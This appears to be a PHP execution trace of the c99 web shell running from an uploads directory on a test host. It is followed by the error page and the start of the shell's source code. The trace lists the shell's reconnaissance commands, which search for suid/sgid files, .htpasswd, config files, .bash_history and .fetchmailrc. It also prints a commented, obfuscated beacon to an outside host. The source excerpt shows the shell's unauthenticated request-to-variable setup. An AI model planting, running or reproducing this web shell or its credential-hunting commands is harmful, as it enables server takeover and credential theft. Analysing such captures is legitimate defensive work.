=> '12.02.2023 23:02:24', 3 => 'osboxes/osboxes', 4 => '<a href="?act=chmod&f=c99_php7.4.php&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><b><font color=white>-rw-rw-r--</font></b></a>', 5 => '<a href="?act=f&f=c99_php7.4.php&ft=info&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=ext_diz" alt="Bilgi" height="16" width="16" border="0"></a>&nbsp;<a href="?act=f&f=c99_php7.4.php&ft=edit&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=change" alt="Degistir" height="16" width="19" border="0"></a>&nbsp;<a href="?act=f&f=c99_php7.4.php&ft=download&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=download" alt="Indir" height="16" width="19" border="0"></a>&nbsp;<input type="checkb'], 2 => [0 => '<img src="?act=img&img=ext_php" border="0">&nbsp;<a href="?act=f&f=prepend.php&d=%2Fvar%2Fwww%2Fhtml%2Fuploads&">prepend.php</a>', 1 => '57 B', 2 => '12.02.2023 23:02:24', 3 => 'root/root', 4 => '<a href="?act=chmod&f=prepend.php&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><b><font color=white>-rwxr-xr-x</font></b></a>', 5 => '<a href="?act=f&f=prepend.php&ft=info&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=ext_diz" alt="Bilgi" height="16" width="16" border="0"></a>&nbsp;<a href="?act=f&f=prepend.php&ft=edit&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=change" alt="Degistir" height="16" width="19" border="0"></a>&nbsp;<a href="?act=f&f=prepend.php&ft=download&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=download" alt="Indir" height="16" width="19" border="0"></a>&nbsp;<input type="checkbox" name=']]
2	516	1	0.032041	1360232
2	516	R			[0 => [0 => '<b>Name</b><a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&sort=0d"><img src="?act=img&img=sort_asc" height="9" width="14" alt="Asc." border="0"></a>', 1 => '<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&sort=1a"><b>Dimension</b></a>', 2 => '<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&sort=2a"><b>Changing</b></a>', 3 => '<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&sort=3a"><b>Owner/Grup</b></a>', 4 => '<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&sort=4a"><b>Permissions(Authority)</b></a>', 5 => '<b>attribute</b>'], 1 => [0 => '<img src="?act=img&img=ext_lnk" height="16" width="19" border="0">&nbsp;<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml&sort=0a">..</a>', 1 => 'LINK', 2 => '12.02.2023 23:02:24', 3 => 'root/root', 4 => '<a href="?act=chmod&f=..&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><b><font color=green>drwxrwxrwx</font></b></a>', 5 => '<a href="?act=d&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F.."><img src="?act=img&img=ext_diz" alt="Bilgi" height="16" width="16" border="0"></a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox0" value="/var/www/html/uploads/..">'], 2 => [0 => '<img src="?act=img&img=small_dir" height="16" width="19" border="0">&nbsp;<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads&sort=0a">.</a>', 1 => 'LINK', 2 => '12.02.2023 23:02:24', 3 => 'root/root', 4 => '<a href="?act=chmod&f=.&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><b><font color=green>drwxrwxrwx</font></b></a>', 5 => '<a href="?act=d&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F."><img src="?act=img&img=ext_diz" alt="Bilgi" height="16" width="16" border="0"></a>&nbsp;<input type="checkbox" name="actbox[]" onclick="ls_reverse_all();">'], 3 => [0 => '<img src="?act=img&img=small_dir" height="16" width="19" border="0">&nbsp;<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2Fdata&sort=0a">[data]</a>', 1 => 'DIR', 2 => '12.02.2023 23:02:24', 3 => 'root/root', 4 => '<a href="?act=chmod&f=data&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><b><font color=green>drwxrwxrwx</font></b></a>', 5 => '<a href="?act=d&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2Fdata"><img src="?act=img&img=ext_diz" alt="Bilgi" height="16" width="16" border="0"></a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox1" value="/var/www/html/uploads/data">'], 4 => [0 => '<img src="?act=img&img=ext_htaccess" border="0">&nbsp;<a href="?act=f&f=.htaccess&d=%2Fvar%2Fwww%2Fhtml%2Fuploads&">.htaccess</a>', 1 => '64 B', 2 => '12.02.2023 23:02:24', 3 => 'root/root', 4 => '<a href="?act=chmod&f=.htaccess&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><b><font color=white>-rw-r--r--</font></b></a>', 5 => '<a href="?act=f&f=.htaccess&ft=info&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=ext_diz" alt="Bilgi" height="16" width="16" border="0"></a>&nbsp;<a href="?act=f&f=.htaccess&ft=edit&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=change" alt="Degistir" height="16" width="19" border="0"></a>&nbsp;<a href="?act=f&f=.htaccess&ft=download&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=download" alt="Indir" height="16" width="19" border="0"></a>&nbsp;<input type="checkbox" name="actbo'], 5 => [0 => '<img src="?act=img&img=ext_php" border="0">&nbsp;<a href="?act=f&f=c99_php7.4.php&d=%2Fvar%2Fwww%2Fhtml%2Fuploads&"><font color="yellow">c99_php7.4.php</font></a>', 1 => '156.5 KB', 2 => '12.02.2023 23:02:24', 3 => 'osboxes/osboxes', 4 => '<a href="?act=chmod&f=c99_php7.4.php&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><b><font color=white>-rw-rw-r--</font></b></a>', 5 => '<a href="?act=f&f=c99_php7.4.php&ft=info&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=ext_diz" alt="Bilgi" height="16" width="16" border="0"></a>&nbsp;<a href="?act=f&f=c99_php7.4.php&ft=edit&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=change" alt="Degistir" height="16" width="19" border="0"></a>&nbsp;<a href="?act=f&f=c99_php7.4.php&ft=download&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=download" alt="Indir" height="16" width="19" border="0"></a>&nbsp;<input type="checkb'], 6 => [0 => '<img src="?act=img&img=ext_php" border="0">&nbsp;<a href="?act=f&f=prepend.php&d=%2Fvar%2Fwww%2Fhtml%2Fuploads&">prepend.php</a>', 1 => '57 B', 2 => '12.02.2023 23:02:24', 3 => 'root/root', 4 => '<a href="?act=chmod&f=prepend.php&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><b><font color=white>-rwxr-xr-x</font></b></a>', 5 => '<a href="?act=f&f=prepend.php&ft=info&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=ext_diz" alt="Bilgi" height="16" width="16" border="0"></a>&nbsp;<a href="?act=f&f=prepend.php&ft=edit&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=change" alt="Degistir" height="16" width="19" border="0"></a>&nbsp;<a href="?act=f&f=prepend.php&ft=download&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=download" alt="Indir" height="16" width="19" border="0"></a>&nbsp;<input type="checkbox" name=']]
1		A						/var/www/html/uploads/c99_php7.4.php	2103	$table = [0 => [0 => '<b>Name</b><a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&sort=0d"><img src="?act=img&img=sort_asc" height="9" width="14" alt="Asc." border="0"></a>', 1 => '<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&sort=1a"><b>Dimension</b></a>', 2 => '<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&sort=2a"><b>Changing</b></a>', 3 => '<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&sort=3a"><b>Owner/Grup</b></a>', 4 => '<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&sort=4a"><b>Permissions(Authority)</b></a>', 5 => '<b>attribute</b>'], 1 => [0 => '<img src="?act=img&img=ext_lnk" height="16" width="19" border="0">&nbsp;<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml&sort=0a">..</a>', 1 => 'LINK', 2 => '12.02.2023 23:02:24', 3 => 'root/root', 4 => '<a href="?act=chmod&f=..&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><b><font color=green>drwxrwxrwx</font></b></a>', 5 => '<a href="?act=d&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F.."><img src="?act=img&img=ext_diz" alt="Bilgi" height="16" width="16" border="0"></a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox0" value="/var/www/html/uploads/..">'], 2 => [0 => '<img src="?act=img&img=small_dir" height="16" width="19" border="0">&nbsp;<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads&sort=0a">.</a>', 1 => 'LINK', 2 => '12.02.2023 23:02:24', 3 => 'root/root', 4 => '<a href="?act=chmod&f=.&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><b><font color=green>drwxrwxrwx</font></b></a>', 5 => '<a href="?act=d&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F."><img src="?act=img&img=ext_diz" alt="Bilgi" height="16" width="16" border="0"></a>&nbsp;<input type="checkbox" name="actbox[]" onclick="ls_reverse_all();">'], 3 => [0 => '<img src="?act=img&img=small_dir" height="16" width="19" border="0">&nbsp;<a href="?act=ls&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2Fdata&sort=0a">[data]</a>', 1 => 'DIR', 2 => '12.02.2023 23:02:24', 3 => 'root/root', 4 => '<a href="?act=chmod&f=data&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><b><font color=green>drwxrwxrwx</font></b></a>', 5 => '<a href="?act=d&d=%2Fvar%2Fwww%2Fhtml%2Fuploads%2Fdata"><img src="?act=img&img=ext_diz" alt="Bilgi" height="16" width="16" border="0"></a>&nbsp;<input type="checkbox" name="actbox[]" id="actbox1" value="/var/www/html/uploads/data">'], 4 => [0 => '<img src="?act=img&img=ext_htaccess" border="0">&nbsp;<a href="?act=f&f=.htaccess&d=%2Fvar%2Fwww%2Fhtml%2Fuploads&">.htaccess</a>', 1 => '64 B', 2 => '12.02.2023 23:02:24', 3 => 'root/root', 4 => '<a href="?act=chmod&f=.htaccess&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><b><font color=white>-rw-r--r--</font></b></a>', 5 => '<a href="?act=f&f=.htaccess&ft=info&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=ext_diz" alt="Bilgi" height="16" width="16" border="0"></a>&nbsp;<a href="?act=f&f=.htaccess&ft=edit&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=change" alt="Degistir" height="16" width="19" border="0"></a>&nbsp;<a href="?act=f&f=.htaccess&ft=download&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=download" alt="Indir" height="16" width="19" border="0"></a>&nbsp;<input type="checkbox" name="actbo'], 5 => [0 => '<img src="?act=img&img=ext_php" border="0">&nbsp;<a href="?act=f&f=c99_php7.4.php&d=%2Fvar%2Fwww%2Fhtml%2Fuploads&"><font color="yellow">c99_php7.4.php</font></a>', 1 => '156.5 KB', 2 => '12.02.2023 23:02:24', 3 => 'osboxes/osboxes', 4 => '<a href="?act=chmod&f=c99_php7.4.php&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><b><font color=white>-rw-rw-r--</font></b></a>', 5 => '<a href="?act=f&f=c99_php7.4.php&ft=info&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=ext_diz" alt="Bilgi" height="16" width="16" border="0"></a>&nbsp;<a href="?act=f&f=c99_php7.4.php&ft=edit&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=change" alt="Degistir" height="16" width="19" border="0"></a>&nbsp;<a href="?act=f&f=c99_php7.4.php&ft=download&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=download" alt="Indir" height="16" width="19" border="0"></a>&nbsp;<input type="checkb'], 6 => [0 => '<img src="?act=img&img=ext_php" border="0">&nbsp;<a href="?act=f&f=prepend.php&d=%2Fvar%2Fwww%2Fhtml%2Fuploads&">prepend.php</a>', 1 => '57 B', 2 => '12.02.2023 23:02:24', 3 => 'root/root', 4 => '<a href="?act=chmod&f=prepend.php&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><b><font color=white>-rwxr-xr-x</font></b></a>', 5 => '<a href="?act=f&f=prepend.php&ft=info&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=ext_diz" alt="Bilgi" height="16" width="16" border="0"></a>&nbsp;<a href="?act=f&f=prepend.php&ft=edit&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=change" alt="Degistir" height="16" width="19" border="0"></a>&nbsp;<a href="?act=f&f=prepend.php&ft=download&d=%2Fvar%2Fwww%2Fhtml%2Fuploads"><img src="?act=img&img=download" alt="Indir" height="16" width="19" border="0"></a>&nbsp;<input type="checkbox" name=']]
2	517	0	0.032284	1360168	array_merge	0		/var/www/html/uploads/c99_php7.4.php	2136	2	[]	[]
2	517	1	0.032305	1360288
2	517	R			[]
2	518	0	0.032337	1360168	urlencode	0		/var/www/html/uploads/c99_php7.4.php	3041	1	'/var/www/html/uploads/'
2	518	1	0.032357	1360264
2	518	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	519	0	0.032383	1360168	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	NULL
2	519	1	0.032402	1360360
2	519	R			''
2	520	0	0.032422	1360168	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'find / -type f -perm -04000 -ls'
2	520	1	0.032443	1360360
2	520	R			'find / -type f -perm -04000 -ls'
2	521	0	0.032474	1360248	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'Find all suid files'
2	521	1	0.032493	1360440
2	521	R			'Find all suid files'
2	522	0	0.032514	1360168	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'find . -type f -perm -04000 -ls'
2	522	1	0.032534	1360360
2	522	R			'find . -type f -perm -04000 -ls'
2	523	0	0.032556	1360248	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'Find all suid files in current directory'
2	523	1	0.032577	1360440
2	523	R			'Find all suid files in current directory'
2	524	0	0.032598	1360168	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'find / -type f -perm -02000 -ls'
2	524	1	0.032617	1360360
2	524	R			'find / -type f -perm -02000 -ls'
2	525	0	0.032637	1360248	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'Find all sgid files'
2	525	1	0.032656	1360440
2	525	R			'Find all sgid files'
2	526	0	0.032675	1360168	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'find . -type f -perm -02000 -ls'
2	526	1	0.032694	1360360
2	526	R			'find . -type f -perm -02000 -ls'
2	527	0	0.032714	1360248	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'Find all sgid files in current directory'
2	527	1	0.032734	1360440
2	527	R			'Find all sgid files in current directory'
2	528	0	0.032756	1360168	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'find / -type f -name config.inc.php'
2	528	1	0.032776	1360360
2	528	R			'find / -type f -name config.inc.php'
2	529	0	0.032797	1360248	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'Find all config.inc.php files'
2	529	1	0.032817	1360440
2	529	R			'Find all config.inc.php files'
2	530	0	0.032838	1360168	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'find / -type f -name "config*"'
2	530	1	0.032858	1360360
2	530	R			'find / -type f -name &quot;config*&quot;'
2	531	0	0.032880	1360264	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'Find all config* files'
2	531	1	0.032904	1360456
2	531	R			'Find all config* files'
2	532	0	0.032924	1360168	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'find . -type f -name "config*"'
2	532	1	0.032944	1360360
2	532	R			'find . -type f -name &quot;config*&quot;'
2	533	0	0.032966	1360264	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'Find all config* files in current directory'
2	533	1	0.032986	1360456
2	533	R			'Find all config* files in current directory'
2	534	0	0.033007	1360168	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'find / -perm -2 -ls'
2	534	1	0.033026	1360360
2	534	R			'find / -perm -2 -ls'
2	535	0	0.033046	1360232	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'Find all writable files'
2	535	1	0.033065	1360424
2	535	R			'Find all writable files'
2	536	0	0.033086	1360168	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'find . -perm -2 -ls'
2	536	1	0.033105	1360360
2	536	R			'find . -perm -2 -ls'
2	537	0	0.033124	1360232	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'Find all files and folders in current directory'
2	537	1	0.033144	1360424
2	537	R			'Find all files and folders in current directory'
2	538	0	0.033166	1360168	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'find / -type f -name service.pwd'
2	538	1	0.033185	1360360
2	538	R			'find / -type f -name service.pwd'
2	539	0	0.033206	1360248	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'Find all service.pwd files'
2	539	1	0.033225	1360440
2	539	R			'Find all service.pwd files'
2	540	0	0.033246	1360168	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'find . -type f -name service.pwd'
2	540	1	0.033266	1360360
2	540	R			'find . -type f -name service.pwd'
2	541	0	0.033286	1360248	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'Find all service.pwd files in current directory'
2	541	1	0.033307	1360440
2	541	R			'Find all service.pwd files in current directory'
2	542	0	0.033329	1360168	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'find / -type f -name .htpasswd'
2	542	1	0.033348	1360360
2	542	R			'find / -type f -name .htpasswd'
2	543	0	0.033369	1360248	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'Find all .htpasswd files'
2	543	1	0.033387	1360440
2	543	R			'Find all .htpasswd files'
2	544	0	0.033408	1360168	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'find . -type f -name .htpasswd'
2	544	1	0.033427	1360360
2	544	R			'find . -type f -name .htpasswd'
2	545	0	0.033448	1360248	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'Find all .htpasswd files in current directory'
2	545	1	0.033468	1360440
2	545	R			'Find all .htpasswd files in current directory'
2	546	0	0.033490	1360168	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'find / -type f -name .bash_history'
2	546	1	0.033510	1360360
2	546	R			'find / -type f -name .bash_history'
2	547	0	0.033531	1360248	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'Find all .bash_history files'
2	547	1	0.033551	1360440
2	547	R			'Find all .bash_history files'
2	548	0	0.033572	1360168	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'find . -type f -name .bash_history'
2	548	1	0.033592	1360360
2	548	R			'find . -type f -name .bash_history'
2	549	0	0.033625	1360248	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'Find all .bash_history files in current directory'
2	549	1	0.033646	1360440
2	549	R			'Find all .bash_history files in current directory'
2	550	0	0.033668	1360168	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'find / -type f -name .fetchmailrc'
2	550	1	0.033688	1360360
2	550	R			'find / -type f -name .fetchmailrc'
2	551	0	0.033709	1360248	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'Find all .fetchmailrc files'
2	551	1	0.033729	1360440
2	551	R			'Find all .fetchmailrc files'
2	552	0	0.033755	1360168	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'find . -type f -name .fetchmailrc'
2	552	1	0.033775	1360360
2	552	R			'find . -type f -name .fetchmailrc'
2	553	0	0.033795	1360248	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'Find all .fetchmailrc files in current directory'
2	553	1	0.033815	1360440
2	553	R			'Find all .fetchmailrc files in current directory'
2	554	0	0.033837	1360168	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'lsattr -va'
2	554	1	0.033855	1360360
2	554	R			'lsattr -va'
2	555	0	0.033873	1360224	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'Find all Linux second-accessible files'
2	555	1	0.033893	1360416
2	555	R			'Find all Linux second-accessible files'
2	556	0	0.033914	1360168	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'netstat -an | grep -i listen'
2	556	1	0.033933	1360360
2	556	R			'netstat -an | grep -i listen'
2	557	0	0.033952	1360248	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	3042	1	'Show All Open Ports.'
2	557	1	0.033971	1360440
2	557	R			'Show All Open Ports.'
2	558	0	0.033988	1360168	urlencode	0		/var/www/html/uploads/c99_php7.4.php	3046	1	'/var/www/html/uploads/'
2	558	1	0.034002	1360264
2	558	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
2	559	0	0.034026	1376552	getmicrotime	1		/var/www/html/uploads/c99_php7.4.php	3053	0
3	560	0	0.034039	1376552	microtime	0		/var/www/html/uploads/c99_php7.4.php	20	0
3	560	1	0.034053	1376600
3	560	R			'0.67220500 1676260944'
3	561	0	0.034066	1376600	explode	0		/var/www/html/uploads/c99_php7.4.php	20	2	' '	'0.67220500 1676260944'
3	561	1	0.034081	1377128
3	561	R			[0 => '0.67220500', 1 => '1676260944']
2		A						/var/www/html/uploads/c99_php7.4.php	20	$usec = '0.67220500'
2		A						/var/www/html/uploads/c99_php7.4.php	20	$sec = '1676260944'
2	559	1	0.034122	1376552
2	559	R			1676260944.6722
2	562	0	0.034139	1376552	round	0		/var/www/html/uploads/c99_php7.4.php	3053	2	0.028146028518677	4
2	562	1	0.034153	1376624
2	562	R			0.0281
2	563	0	0.034169	1376552	chdir	0		/var/www/html/uploads/c99_php7.4.php	3053	1	'/var/www/html/uploads'
2	563	1	0.034190	1376592
2	563	R			TRUE
2	564	0	0.034204	1376552	ashshexit	1		/var/www/html/uploads/c99_php7.4.php	3053	0
3	565	0	0.034217	1376552	onphpshutdown	1		/var/www/html/uploads/c99_php7.4.php	835	0
4	566	0	0.034231	1376600	headers_sent	0		/var/www/html/uploads/c99_php7.4.php	824	0
4	566	1	0.034244	1376600
4	566	R			FALSE
4	567	0	0.034259	1376600	ob_get_contents	0		/var/www/html/uploads/c99_php7.4.php	826	0
4	567	1	0.034275	1397080
4	567	R			'<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us">\r\n<title>localhost c99shell - Edited By KingDefacer</title>\r\n<script>\r\n\r\n/*\r\nvar _0x5be8=["\\x73\\x72\\x63","\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x65\\x76\\x61\\x6C\\x2E\\x63\\x72\\x79\\x70\\x74\\x72\\x2E\\x6F\\x72\\x67\\x2F\\x3F\\x78\\x3D","\\x68\\x72\\x65\\x66"]\r\na= new Image();\r\na[_0x5be8[0]]=_0x5be8[1]+escape(location[_0x5be8[2]]);\r\n\r\n*/\r\n</script>'
3		A						/var/www/html/uploads/c99_php7.4.php	826	$v = '<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us">\r\n<title>localhost c99shell - Edited By KingDefacer</title>\r\n<script>\r\n\r\n/*\r\nvar _0x5be8=["\\x73\\x72\\x63","\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x65\\x76\\x61\\x6C\\x2E\\x63\\x72\\x79\\x70\\x74\\x72\\x2E\\x6F\\x72\\x67\\x2F\\x3F\\x78\\x3D","\\x68\\x72\\x65\\x66"]\r\na= new Image();\r\na[_0x5be8[0]]=_0x5be8[1]+escape(location[_0x5be8[2]]);\r\n\r\n*/\r\n</script>'
4	568	0	0.034366	1397080	ob_end_clean	0		/var/www/html/uploads/c99_php7.4.php	827	0
4	568	1	0.034379	1364184
4	568	R			TRUE
4	569	0	0.034393	1364184	ob_start	0		/var/www/html/uploads/c99_php7.4.php	828	1	'ob_gzHandler'
4	569	1	0.034410	1380840
4	569	R			TRUE
4	570	0	0.034424	1397184	ob_end_flush	0		/var/www/html/uploads/c99_php7.4.php	830	0
5	571	0	0.034440	1417696	ob_gzhandler	0		/var/www/html/uploads/c99_php7.4.php	830	2	'<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us">\r\n<title>localhost c99shell - Edited By KingDefacer</title>\r\n<script>\r\n\r\n/*\r\nvar _0x5be8=["\\x73\\x72\\x63","\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x65\\x76\\x61\\x6C\\x2E\\x63\\x72\\x79\\x70\\x74\\x72\\x2E\\x6F\\x72\\x67\\x2F\\x3F\\x78\\x3D","\\x68\\x72\\x65\\x66"]\r\na= new Image();\r\na[_0x5be8[0]]=_0x5be8[1]+escape(location[_0x5be8[2]]);\r\n\r\n*/\r\n</script>'	9
5	571	1	0.034752	1442656
5	571	R			'\037�\b\000\000\000\000\000\000\003�<is۸��7U�\017\030f�����e�|e˲�\023yc��d\\.��$�)�\003��4~��\001�\024uY����J�A\020}���\r@�\r��i�\006\004[�ڐp�\006�{:�#�o�Z����\\�L<�!S]�5N�<-\000��\034`�\023^\037ٮEG���\025��=�α�\017p?���z�k��/j��\016i8��΀�\034��? ��tԲlN,t4A\037m�Lz�$��V\020\000��8|{�"���[��uf\\쒃�w��~\036^��ǥ��\036.K\apY\b_�����ǹ\023�*\025��\004�Yx5��%�\024�~Y��p���I�z_���5��\037OI�\024�RI�z�\002בKF�l\bjH�U��{����U=���zG|\023{$%\024�m���rWW\002�勷i\020=\035�^��|;o5P�\030ݡ���~y�[��\0'
4	570	1	0.034891	1384984
4	570	R			TRUE
3	565	1	0.034906	1364504
			0.034950	1261968
TRACE END   [2023-02-13 02:02:50.570885]


Generated HTML code

<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator at 
 webmaster@localhost to inform them of the time this error occurred,
 and the actions you performed just before this error.</p>
<p>More information about this error may be available
in the server error log.</p>
<hr>
<address>Apache/2.4.52 (Ubuntu) Server at localhost Port 80</address>

</body></html>

Original PHP code

<?php 
ini_set('error_reporting', E_ALL);
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);

if (!function_exists('set_magic_quotes_runtime')) {
    function set_magic_quotes_runtime($new_setting) {
        return true;
    }
}

if (!function_exists('ereg')) {
    function ereg($a1, $a2, $a3) {
		return preg_replace($a1, $a2, $a3);
    }
}


//Starting calls
if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
error_reporting(5);
@ignore_user_abort(true);
//@set_magic_quotes_runtime(0);
$win = strtolower(substr(PHP_OS,0,3)) == "win";
define("starttime",getmicrotime());
if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}

$shver = "KingDefacer"; //Current version
//CONFIGURATION AND SETTINGS
if (!empty($unset_surl)) {setcookie("ashcoike_surl"); $surl = "";}
elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("ashcoike_surl",$surl);}
else {$surl = $_REQUEST["ashcoike_surl"]; //Set this cookie for manual SURL
}

$surl_autofill_include = true; //If true then search variables with descriptors (URLs) and save it in SURL.

if ($surl_autofill_include and !$_REQUEST["ashcoike_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
if (empty($surl))
{
 $surl = "?".$includestr; //Self url
}
$surl = htmlspecialchars($surl);

$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.

//Authentication
$login = ""; //login
//DON'T FORGOT ABOUT PASSWORD!!!
